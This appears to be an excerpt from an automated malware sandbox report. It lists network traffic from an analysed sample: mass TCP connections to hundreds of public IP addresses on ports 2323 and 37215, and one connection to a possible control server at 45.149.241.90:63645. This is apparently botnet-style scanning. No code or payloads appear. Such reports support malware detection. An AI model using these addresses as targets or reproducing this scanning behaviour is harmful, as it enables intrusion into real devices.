      Source: unknownNetwork traffic detected: HTTP traffic on port 39408 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53338 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53420 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37964 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33390 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51936 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39880 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57566 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42730 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39100 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41780 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46698 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33644 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60798 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43254 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39868 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51740 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44252 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43194 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55208 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43752 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58906 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37128 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36260 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46508 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33898 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39480 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54044 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60662 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40272 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53636 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39502 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57296 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58122 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47930 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36756 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33356 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37564 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45280 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46232 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50338 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36174 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43242 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37204 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43598 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48128 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32950 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46610 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32810 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45476 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58202 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38734 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57894 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54450 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41256 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38474 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38308 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57568 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43278 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33934 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60954 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45516 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48764 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37682 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59464 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36598 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44764 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38900 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57090 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43802 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55376 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54428 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41204 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57756 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56620 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54758 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40392 -> 37215
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 183.204.106.95:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 31.205.123.116:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 63.219.239.161:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 115.224.16.130:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 221.69.127.6:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 121.112.70.139:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 165.176.179.13:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 189.90.156.123:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 37.140.240.139:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 113.104.31.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 175.69.177.136:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 85.36.163.7:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 104.195.16.58:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 198.46.230.68:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 46.247.54.200:2323
      Source: global trafficTCP traffic: 192.168.2.23:24070 -> 91.85.45.98:2323
      Source: global trafficTCP traffic: 192.168.2.23:51136 -> 45.149.241.90:63645
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.51.43.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.141.157.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.114.175.109:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.190.149.199:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 168.53.71.52:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.34.117.25:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.128.25.192:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.119.171.199:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.161.194.85:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.60.239.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.193.56.121:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.170.133.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.118.125.243:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 143.71.206.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.120.56.221:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.101.3.82:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.111.111.201:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.61.142.226:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.165.84.176:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.86.35.90:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.131.64.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.123.16.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.82.183.12:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.28.40.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.76.250.140:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.165.210.55:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.56.74.159:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.30.250.76:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 208.188.25.183:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.91.212.4:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 220.227.26.180:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 203.134.152.27:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.251.145.45:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.132.199.220:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 181.83.194.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.83.110.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 59.10.198.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.31.109.151:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 32.10.203.115:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 155.75.111.182:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 128.34.60.131:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.2.17.212:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 201.51.99.179:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.88.117.78:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 42.125.118.136:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 106.95.246.147:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.240.196.192:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.47.60.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.1.4.199:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 173.40.40.177:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 136.126.146.116:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.94.22.5:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.72.63.213:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.224.44.51:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 162.199.37.227:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.179.242.22:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.185.106.254:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.136.218.101:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.234.192.151:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.10.8.133:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 118.249.101.169:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.149.251.27:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.139.7.61:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.193.183.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.51.221.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.38.53.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.79.89.152:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.217.213.110:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.128.133.136:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.23.15.134:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 40.248.101.97:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.147.52.248:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 12.166.61.57:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.169.36.169:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.213.193.227:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.150.135.160:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.176.91.96:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.47.181.29:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 140.138.186.192:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.57.222.8:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.191.94.155:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 176.165.29.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.99.238.3:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.74.117.239:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.122.171.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.218.121.168:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.165.31.177:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 94.222.254.126:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 36.57.13.183:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.6.178.91:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 59.197.130.61:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.156.113.182:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 186.105.33.174:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.249.247.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.205.69.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 102.163.8.199:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.42.209.106:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.61.253.0:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.121.124.15:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 130.163.43.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.133.128.236:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.144.164.87:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 182.158.131.35:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.31.155.223:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.142.52.60:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.115.46.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.86.197.174:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 77.236.43.53:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.167.175.11:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.124.20.231:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 138.124.166.192:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.129.142.215:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.235.131.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.153.174.133:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.63.129.185:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.152.5.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.197.182.82:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 151.131.255.47:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.94.118.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.226.4.60:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.0.162.16:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 184.149.220.48:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 201.151.252.65:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.131.104.150:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.89.100.75:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.18.52.168:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.13.128.136:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.168.49.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.186.131.227:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 19.179.233.141:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 116.95.31.124:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.153.152.240:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.246.152.88:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.50.228.215:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 34.79.181.217:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.6.113.140:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.77.24.174:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 221.93.237.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.11.82.166:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.38.185.194:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 216.157.115.64:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.9.149.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.179.234.39:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.249.68.225:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.121.176.222:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.255.41.29:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.128.225.222:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.242.140.44:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 181.22.21.131:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.72.107.150:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.195.59.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.96.102.109:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.196.212.101:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.209.56.158:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.27.86.26:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.131.151.79:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.85.157.143:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.233.121.175:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.1.22.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.1.176.165:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.103.92.181:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 124.15.31.250:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.112.116.96:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.203.128.170:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.38.194.187:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.150.0.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.170.190.52:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 169.219.149.56:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.248.71.246:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.89.161.132:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.25.248.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.71.92.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.49.55.41:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.246.91.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.244.246.101:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 159.134.230.110:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.55.134.221:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.91.105.222:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.210.23.150:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 80.84.87.191:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.46.79.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.71.138.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.8.228.71:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.162.130.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.238.131.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.109.69.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.8.64.183:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.48.41.143:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.162.88.59:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.127.121.12:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 182.34.125.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 25.200.109.29:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.75.127.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.221.240.117:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.9.47.212:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 88.240.44.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.148.40.60:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 169.39.43.63:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.223.37.82:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.231.11.22:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 18.56.102.241:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.196.120.162:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.152.2.253:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.135.210.107:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.48.128.226:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 79.145.19.60:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.1.105.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.27.181.219:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 63.12.19.72:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.254.240.72:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 38.60.72.179:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.126.58.231:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.90.181.197:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.34.90.232:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.213.38.225:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.64.118.151:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 166.0.9.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.35.94.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.255.52.96:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.26.203.246:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.72.222.192:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 67.166.248.79:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.149.118.32:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 124.229.54.106:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.0.0.71:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 196.169.174.4:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.93.165.28:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.219.86.33:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 54.134.35.81:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 25.201.194.114:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.126.81.47:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.217.124.46:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.108.163.57:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.26.170.106:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 121.1.89.2:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.202.128.143:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.87.218.37:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.28.223.230:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.27.24.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.109.58.91:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.132.198.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.217.182.245:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 99.137.27.100:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 70.49.138.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.189.150.52:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 210.131.37.36:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.37.80.145:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.161.230.195:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 64.112.0.88:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.102.16.57:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 41.25.54.63:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 157.52.127.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 143.0.189.10:37215
      Source: global trafficTCP traffic: 192.168.2.23:24582 -> 197.47.46.203:37215
